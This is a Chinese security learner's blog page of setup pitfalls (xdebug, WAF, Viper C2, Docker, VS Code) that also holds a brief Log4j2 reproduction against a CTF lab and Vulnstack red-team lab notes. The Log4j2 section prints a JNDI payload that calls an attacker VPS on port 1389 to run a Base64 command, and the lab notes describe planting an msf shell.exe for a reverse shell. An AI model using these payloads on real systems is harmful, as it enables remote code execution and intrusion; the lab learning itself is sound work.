<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="前言仅作为自己学习网络安全,程序开发所踩的坑的记录 网络安全掉坑记利用PHPStudy搭建vscode + xdebug调试环境    前言:坑爹日记:新开的坑,记录自己走过的坑,避免以后忘记导致查资料会很痛苦. “利用PHPStudy搭建vscode + xdebug调试环境” 的作用:方便代码审计 牢骚:代码审计真的太难了,审一个cms审了很久也挖不出漏洞,挫败感太强了,所以找了以前被">
<meta property="og:type" content="article">
<meta property="og:title" content="[掉坑日记]掉坑汇总">
<meta property="og:url" content="https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/index.html">
<meta property="og:site_name" content="TonyD0g">
<meta property="og:description" content="前言仅作为自己学习网络安全,程序开发所踩的坑的记录 网络安全掉坑记利用PHPStudy搭建vscode + xdebug调试环境    前言:坑爹日记:新开的坑,记录自己走过的坑,避免以后忘记导致查资料会很痛苦. “利用PHPStudy搭建vscode + xdebug调试环境” 的作用:方便代码审计 牢骚:代码审计真的太难了,审一个cms审了很久也挖不出漏洞,挫败感太强了,所以找了以前被">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OpleZd.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplEse.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplVqH.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplnII.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplmdA.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplKit.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7xKEt.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7xMUP.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7xQ4f.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7x1C8.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7zCrj.png">
<meta property="article:published_time" content="2022-04-14T07:23:09.000Z">
<meta property="article:modified_time" content="2023-07-20T07:36:00.472Z">
<meta property="article:author" content="TonyD0g">
<meta property="article:tag" content="掉坑日记">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2022/04/30/OpleZd.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>[掉坑日记]掉坑汇总</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2022/05/19/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E5%AD%A6%E4%B9%A0%E6%96%87%E7%AB%A0%E6%94%B6%E5%BD%95/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2022/03/22/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E7%AF%87CobaltStrike%E5%9F%BA%E7%A1%80%E4%BD%BF%E7%94%A8/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&text=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&is_video=false&description=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[掉坑日记]掉坑汇总&body=Check out this article: https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&title=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&name=[掉坑日记]掉坑汇总&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/&t=[掉坑日记]掉坑汇总" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#网络安全掉坑记"><span class="toc-number">2.</span> <span class="toc-text">网络安全掉坑记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#利用PHPStudy搭建vscode-xdebug调试环境"><span class="toc-number">2.1.</span> <span class="toc-text">利用PHPStudy搭建vscode + xdebug调试环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用Monitor监控SQL语句方便代码审计"><span class="toc-number">2.2.</span> <span class="toc-text">利用Monitor监控SQL语句方便代码审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#搭建WAF"><span class="toc-number">2.3.</span> <span class="toc-text">搭建WAF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#VPS搭建Viper平台"><span class="toc-number">2.4.</span> <span class="toc-text">VPS搭建Viper平台</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Log4j2简单复现"><span class="toc-number">2.5.</span> <span class="toc-text">Log4j2简单复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#VulnstackRedTeam1"><span class="toc-number">2.6.</span> <span class="toc-text">VulnstackRedTeam1</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#通关教程"><span class="toc-number">3.</span> <span class="toc-text">通关教程</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#坑点记录"><span class="toc-number">4.</span> <span class="toc-text">坑点记录</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#博客："><span class="toc-number">5.</span> <span class="toc-text">博客：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#VPS"><span class="toc-number">6.</span> <span class="toc-text">VPS:</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#数据库："><span class="toc-number">7.</span> <span class="toc-text">数据库：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Docker"><span class="toc-number">8.</span> <span class="toc-text">Docker:</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Visual-Studio-VScode-："><span class="toc-number">9.</span> <span class="toc-text">Visual Studio&#x2F;VScode ：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#多线程编程"><span class="toc-number">10.</span> <span class="toc-text">多线程编程</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        [掉坑日记]掉坑汇总
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">TonyD0g</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-04-14T07:23:09.000Z" itemprop="datePublished">2022-04-14</time>
        
        (Updated: <time datetime="2023-07-20T07:36:00.472Z" itemprop="dateModified">2023-07-20</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0/" rel="tag">掉坑日记</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <span id="more"></span>



<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>仅作为自己学习网络安全,程序开发所踩的坑的记录</p>
<h1 id="网络安全掉坑记"><a href="#网络安全掉坑记" class="headerlink" title="网络安全掉坑记"></a>网络安全掉坑记</h1><h2 id="利用PHPStudy搭建vscode-xdebug调试环境"><a href="#利用PHPStudy搭建vscode-xdebug调试环境" class="headerlink" title="利用PHPStudy搭建vscode + xdebug调试环境"></a>利用PHPStudy搭建vscode + xdebug调试环境</h2><font size=4 >

<!-- more -->

<p><strong>前言:</strong><br>坑爹日记:<br>新开的坑,记录自己走过的坑,避免以后忘记导致查资料会很痛苦.</p>
<p>“利用PHPStudy搭建vscode + xdebug调试环境” 的作用:<br>方便代码审计</p>
<p>牢骚:<br>代码审计真的太难了,审一个cms审了很久也挖不出漏洞,挫败感太强了,所以找了以前被挖穿的cms来复现看看,学下前辈们的思路和方法.最近更新速度下降了,是因为我没东西产出了,未来更新速度可能依旧会很慢(毕竟没东西产出,该产出的都一股脑输出了).因为学校突如其来的延期开学,我想着不能浪费差不多一个月的时间,所以就买了书学习,谁知道这快递速度真的感人,导致这几天我一直在等快递,心累┓(;´_｀)┏.</p>
<p><strong>小技巧:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">修改debug中的变量大小:</span><br><span class="line">https://www.baidu.com/link?url=DJqbgSK3g4NZviIBkMEvYuZvIZC0zoJ8Cy_2TJ1XjJZGWj5fB3mqC7p6ytxSarvxZfsABwVdpoKdoCOq&amp;wd=&amp;eqid=c01377e70001d7de00000006624d51fb</span><br></pre></td></tr></table></figure>

<p><strong>正文</strong><br>利用PHPStudy搭建xdebug调试环境 + vscode</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https://www.cnblogs.com/Risk2S/p/12369002.html </span><br><span class="line">https://www.cnblogs.com/phonecom/p/10340038.html</span><br><span class="line">https://www.baidu.com/link?url=8d4VCGsR9zKH69FzQDtb8K0LJBjXvzVZFyZqlxKpFiOlTlOj2wcTU4W0_cJP7V2rlTpZaBHjVTDJZDIXfPdEjdpV7jyAW-DPux0ycLZHFFO&amp;wd=&amp;eqid=dc8e04b000001e540000000662144793</span><br></pre></td></tr></table></figure>

<p><strong>PS: php.ini 文件的最后加上下面这些代码</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[XDebug]</span><br><span class="line">    zend_extension=D:\phpstudy_pro\Extensions\php\php5.4.45nts\ext\php_xdebug.dll     ;用自己的路径,(全路径)</span><br><span class="line">    xdebug.remote_enable = 1   ;开启远程调试功能</span><br><span class="line">    xdebug.remote_autostart = 1    ;这个配置是比较重要的一个配置</span><br><span class="line">    xdebug.remote_handler = &quot;dbgp&quot;</span><br><span class="line">    xdebug.remote_port = &quot;9001&quot;   ;端口号</span><br><span class="line">    xdebug.remote_host = &quot;127.0.0.1&quot; ;远程调试的ip地址，即你自己的本机ip</span><br></pre></td></tr></table></figure>

<p><strong>调试步骤:</strong><br>1.vscode打开项目源代码,下断点<br>2.按F5,开始调试<br>3.刷新浏览器,开始代码审计</p>
</font>

<h2 id="利用Monitor监控SQL语句方便代码审计"><a href="#利用Monitor监控SQL语句方便代码审计" class="headerlink" title="利用Monitor监控SQL语句方便代码审计"></a>利用Monitor监控SQL语句方便代码审计</h2><font size=4 >

<!-- more -->

<p><strong>源代码下载安装:</strong><br>MySQL-Monitor：<a href="https://github.com/cw1997/MySQL-Monitor">https://github.com/cw1997/MySQL-Monitor</a></p>
<p><strong>操作流程:</strong><br>(操作前提:php版本在5.4以上!!!)<br>MySQL-Monitor的代码全下载并解压后,将全部文件 复制或移动 到待审计的 cms或项目 下,访问mysql_monitor_client.html, 输入数据库root用户的账号和密码,连接就完事了.<br></font></p>
<h2 id="搭建WAF"><a href="#搭建WAF" class="headerlink" title="搭建WAF"></a>搭建WAF</h2><font size=4 >

<!-- more -->

<p><strong>前言：</strong><br>晚上更新：md，吃完饭又不行了。真折磨。搞半天<code>重启又好了</code>，真的迷惑<br>D盾搭建失败，安全狗也搭建不行。今天终于弄好了，真够折磨的。<br>不是在搭环境，就是搭环境的路上，麻了。</p>
<p><strong>正文</strong><br><a href="https://blog.csdn.net/songling515010475/article/details/106845000" target="_blank" rel="noopener">phpstudy安装安全狗找不到服务名</a></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OpleZd.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplEse.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplVqH.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplnII.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplmdA.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplKit.png" alt="avatar"></p>
<p><strong>示例模板:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">D:\phpstudy_pro\Extensions\Apache2.4.39</span><br><span class="line"></span><br><span class="line">D:\phpstudy_pro\Extensions\Apache2.4.39</span><br><span class="line"></span><br><span class="line">D:\phpstudy_pro\Extensions\Apache2.4.39\conf\httpd.conf</span><br><span class="line"></span><br><span class="line">D:\phpstudy_pro\Extensions\Apache2.4.39\bin\httpd.exe</span><br><span class="line"></span><br><span class="line">apache2.4.39</span><br></pre></td></tr></table></figure>

</font>

<h2 id="VPS搭建Viper平台"><a href="#VPS搭建Viper平台" class="headerlink" title="VPS搭建Viper平台"></a>VPS搭建Viper平台</h2><font size=4 >

<!-- more -->

<p><strong>前言</strong><br>Viper：内网渗透利器<br>未来也会搭建CS<br>搭建这个搞了两小时，真的麻了,记录一下防止以后再坑我一次.</p>
<p><strong>必看:</strong><br><a href="https://zhuanlan.zhihu.com/p/76391447" target="_blank" rel="noopener">Xshell连接服务器</a><br><a href="https://www.yuque.com/vipersec/help/olg1ua" target="_blank" rel="noopener">Viper安装指南</a><br>先去服务器厂商那关闭服务器,</p>
<p>然后创建密钥,<br><img src="https://s1.ax1x.com/2022/03/12/b7xKEt.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/03/12/b7xMUP.png" alt="avatar"></p>
<p>并绑定密钥,</p>
<p>注意创建密钥后会<strong>只会提供一次密钥文件下载！，所以一定要保存好该密钥文件,因为用xshell连接服务器会需要它，而且经常需要！！！</strong><br><img src="https://s1.ax1x.com/2022/03/12/b7xQ4f.png" alt="avatar"></p>
<p><strong>如果你使用VPS部署Viper,请确认VPS的防火墙开放了60000端口及后续监听需要的端口</strong></p>
<p><strong>请注意，</strong><br>如果你装了什么小皮面板，或者其他什么面板，一定要去同时去 面板和服务器厂商那开放指定端口，不然会出现各种错误，我就是栽在这了。<br><img src="https://s1.ax1x.com/2022/03/12/b7x1C8.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/03/12/b7zCrj.png" alt="avatar"><br></font></p>
<h2 id="Log4j2简单复现"><a href="#Log4j2简单复现" class="headerlink" title="Log4j2简单复现"></a>Log4j2简单复现</h2><font size=4 >

<!-- more -->

<p><strong>前言:</strong></p>
<p>2021年12月份爆出的漏洞，但是因为是java组件我了解的不多所以一直没有去复现。<br>前些天hvv面试问了，直接答的没复现。我感觉这样啥都不懂是不行的，所以今天抽空看了下复现。<br><code>仅仅复现了，具体代码原理不清楚</code>。主要靠别的师傅博客进行学习。</p>
<p><strong>复现过程：</strong></p>
<p>给的两张图讲的很明白：<br><a href="https://blog.csdn.net/hiahiaQ_Q/article/details/123720995" target="_blank" rel="noopener">log4j</a></p>
<p><a href="https://github.com/Yihsiwei/Log4j-exp">EXP</a></p>
<p><strong>所需条件：</strong></p>
<p>CTFshow靶场 , 一台VPS</p>
<p><a href="https://www.ltool.net/base64-encode-and-decode-in-simplified-chinese.php" target="_blank" rel="noopener">Base64在线</a></p>
<p><a href="https://www.bejson.com/enc/urlencode/" target="_blank" rel="noopener">Url编码</a></p>
<p><a href="http://www.dnslog.cn/" target="_blank" rel="noopener">dnslog</a></p>
<p><strong>验证playload:</strong></p>
<p>${jndi:ldap:&#x2F;&#x2F;TonyD0g.dnslog.cn}</p>
<p><strong>GetShell playload:</strong></p>
<p>${jndi:ldap:&#x2F;&#x2F;VPSIP:1389&#x2F;Basic&#x2F;Command&#x2F;Base64&#x2F;xxxxxxxxx}</p>
</font>

<h2 id="VulnstackRedTeam1"><a href="#VulnstackRedTeam1" class="headerlink" title="VulnstackRedTeam1"></a>VulnstackRedTeam1</h2><!-- more -->

<h1 id="通关教程"><a href="#通关教程" class="headerlink" title="通关教程"></a>通关教程</h1><p>(这里psexec不知道为什么我不行，所以换msf上了,结果msf搞得我头大，proxychains死活不行。直接上头了，让kali镜像回溯为初始状态,然后psexec就能用了,迷惑…)</p>
<p><a href="https://blog.csdn.net/qq_46527080/article/details/112648202" target="_blank" rel="noopener">所以这里我看的这个通关</a></p>
<p><a href="https://blog.csdn.net/weixin_45605352/article/details/119740990?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164033306816780261969442%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164033306816780261969442&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-119740990.first_rank_v2_pc_rank_v29&utm_term=%E7%BA%A2%E6%97%A5%E5%AE%89%E5%85%A8vulnstack-ATT&CK%E5%AE%9E%E6%88%98%E7%B3%BB%E5%88%97%20%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%EF%BC%88%E4%B8%80%EF%BC%89&spm=1018.2226.3001.4187" target="_blank" rel="noopener">这个是上面的详细版</a></p>
<p>也可以学习下别的师傅的思路：<br><a href="https://xz.aliyun.com/t/10076#toc-5" target="_blank" rel="noopener">链接1</a></p>
<p><a href="https://www.baidu.com/link?url=TwVhsVlUPEBKKs78IVPB46vMwZbdk7SGXvwoGllzdSaFSAaX9doWX8-HnuKCzgTZqbZHKHQ6TVtv57VnytEqoK&wd=&eqid=cde645d5000025d70000000662578f72" target="_blank" rel="noopener">链接2</a></p>
<h1 id="坑点记录"><a href="#坑点记录" class="headerlink" title="坑点记录"></a>坑点记录</h1><p>(坑点0)<br><a href="https://www.cnblogs.com/g0udan/p/12411937.html" target="_blank" rel="noopener">MSF进程迁移</a></p>
<p>(坑点1)<br>msf生成的shell.exe需要通过蚁剑上传到web服务器上,msf开启监听反弹shell<br>再通过蚁剑终端start shell.exe</p>
<p>(坑点2)<br><a href="https://www.baidu.com/link?url=MG-VGqpe91mLDxUp36Hm-j59ad16vfB6acPzId8xVPfY6SY_FghlxKO_EnryUh5eDsrUGO2smIYWhbLOpBIlayOAH6ATO6W7pzfM-JYWVfa&wd=&eqid=ca8584de000378ae0000000662579c45" target="_blank" rel="noopener">proxychains的使用</a></p>
<p>(坑点3)<br>CS psexec使用不了说明你CS卡死了，出现其他莫名其妙的情况,比如remove不了也是CS卡死了,重启CS 或 直接暴力回溯镜像 解决问题</p>
<p>(坑点4)<br>auxiliary&#x2F;server&#x2F;socks4a 在MSF6用不了<br>只能用 auxiliary&#x2F;server&#x2F;socks_proxy</p>
<h1 id="博客："><a href="#博客：" class="headerlink" title="博客："></a>博客：</h1><p><a href="https://zhuanlan.zhihu.com/p/474967971" target="_blank" rel="noopener">解决Hexo建站使用toc目录跳转 undefined的问题</a></p>
<p><a href="https://blog.csdn.net/qq_42951560/article/details/122552109" target="_blank" rel="noopener">hexo静态博客设置文章加密访问</a></p>
<p><a href="http://hk.javashuo.com/article/p-hrzakcbh-vg.html" target="_blank" rel="noopener">hugo+gitee</a></p>
<p><a href="https://ziyan1215.github.io/daily/1638860110/" target="_blank" rel="noopener">Hugo文章加密 | Xuzi</a></p>
<h1 id="VPS"><a href="#VPS" class="headerlink" title="VPS:"></a>VPS:</h1><p><a href="https://v.youhuima.cc/vultr-vps%E6%80%8E%E6%A0%B7%E8%AE%BE%E7%BD%AEssh-keys%E5%B9%B6%E7%94%A8%E4%B9%8B%E6%97%A0%E5%AF%86%E7%A0%81ssh%E7%99%BB%E5%BD%95.html" target="_blank" rel="noopener">vultr-vps怎样设置ssh-keys并用之无密码ssh登录</a></p>
<h1 id="数据库："><a href="#数据库：" class="headerlink" title="数据库："></a>数据库：</h1><p><a href="https://blog.csdn.net/qq_34462436/article/details/104690779" target="_blank" rel="noopener">mysql错误：Subquery returns more than 1 row</a></p>
<p><a href="https://www.cnblogs.com/jingran/p/16120104.html" target="_blank" rel="noopener">Java连接数据库</a></p>
<p><a href="https://github.com/baa-god/sql_node/blob/master/mysql/MySQL%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0.md">Mysql常用语句</a></p>
<h1 id="Docker"><a href="#Docker" class="headerlink" title="Docker:"></a>Docker:</h1><p><a href="https://blog.csdn.net/tpriwwq/article/details/41446277" target="_blank" rel="noopener">Win10系统基于WSL2安装Docker问题小结</a></p>
<p>1.不使用docker:(禁用hyper-v)</p>
<p>bcdedit &#x2F;set hypervisorlaunchtype off </p>
<p>2.使用docker<br>bcdedit &#x2F;set hypervisorlaunchtype auto</p>
<p>3.记得重启</p>
<h1 id="Visual-Studio-VScode-："><a href="#Visual-Studio-VScode-：" class="headerlink" title="Visual Studio&#x2F;VScode ："></a>Visual Studio&#x2F;VScode ：</h1><p><a href="https://blog.csdn.net/weixin_44671418/article/details/108124188" target="_blank" rel="noopener">Visual Studio高低版本转换</a></p>
<p><strong>VScode必装插件</strong></p>
<font size=4 >

<!-- more -->

<p>1.前端插件<br>2.各种语言插件<br>3.效率插件</p>
<p><strong>1.前端插件:</strong></p>
<p>Auto Close Tag<br>Auto Rename Tag<br>Path Intellisense<br>Live Preview</p>
<p><strong>2.各种语言插件:</strong></p>
<p>C&#x2F;C++ :</p>
<ul>
<li>C&#x2F;C++</li>
<li>C++ Intellisense</li>
<li>CMake</li>
<li>CMake Tools</li>
</ul>
<p>PHP :</p>
<ul>
<li>PHP Debug</li>
<li>PHP Intelephense</li>
</ul>
<p>Python :</p>
<ul>
<li>Pylance</li>
<li>Python</li>
<li>Jupyter</li>
</ul>
<p>MASM :</p>
<ul>
<li>MASM&#x2F;TASM</li>
<li>VSCode DOSBOX</li>
</ul>
<p>Docker :</p>
<ul>
<li>Docker</li>
</ul>
<p><strong>3.效率插件(这个可以全给他装上):</strong></p>
<p>BracKet Pair Colorizer 2<br>Chinese<br>Code Runner<br>Markdown Preview Enhanced<br>Markdown Prewview Github Styling<br>Code Translate  (这个看需求装,有时候感觉这个挺烦的)<br>PlantUML</p>
<h1 id="多线程编程"><a href="#多线程编程" class="headerlink" title="多线程编程"></a>多线程编程</h1><p><a href="https://blog.csdn.net/zhuohui307317684/article/details/109723299" target="_blank" rel="noopener">java多线程的使用及易卡死的问题</a></p>
</font>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#网络安全掉坑记"><span class="toc-number">2.</span> <span class="toc-text">网络安全掉坑记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#利用PHPStudy搭建vscode-xdebug调试环境"><span class="toc-number">2.1.</span> <span class="toc-text">利用PHPStudy搭建vscode + xdebug调试环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用Monitor监控SQL语句方便代码审计"><span class="toc-number">2.2.</span> <span class="toc-text">利用Monitor监控SQL语句方便代码审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#搭建WAF"><span class="toc-number">2.3.</span> <span class="toc-text">搭建WAF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#VPS搭建Viper平台"><span class="toc-number">2.4.</span> <span class="toc-text">VPS搭建Viper平台</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Log4j2简单复现"><span class="toc-number">2.5.</span> <span class="toc-text">Log4j2简单复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#VulnstackRedTeam1"><span 